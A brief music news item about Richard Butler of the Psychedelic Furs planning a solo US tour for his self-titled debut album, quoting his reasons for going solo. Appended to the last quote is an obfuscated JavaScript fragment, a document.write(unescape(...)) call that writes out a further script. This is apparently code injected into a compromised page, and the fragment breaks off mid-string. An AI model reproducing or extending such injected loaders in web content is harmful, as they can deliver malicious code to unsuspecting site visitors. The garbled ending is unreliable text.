Longtime Psychedelic Furs frontman Richard Butler is planning a solo trip across America to promote his debut album.
The Pretty In Pink singer will play solo dates in March and April (06), beginning with a show in Chicago, Illinois.
His self-titled album is Butler's first venture into a studio since he recorded Trysome Eatone with Love Split Love in 1997.
But the Furs frontman insists the tour won't mark a permanent departure from his rock group.
He says, "I like the idea of going out and doing something more personal and intimate, with maybe just one or two other musicians.
"I've never done that, and it's great to have that challenge, instead of having a loud rock band to take the pressure off me."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
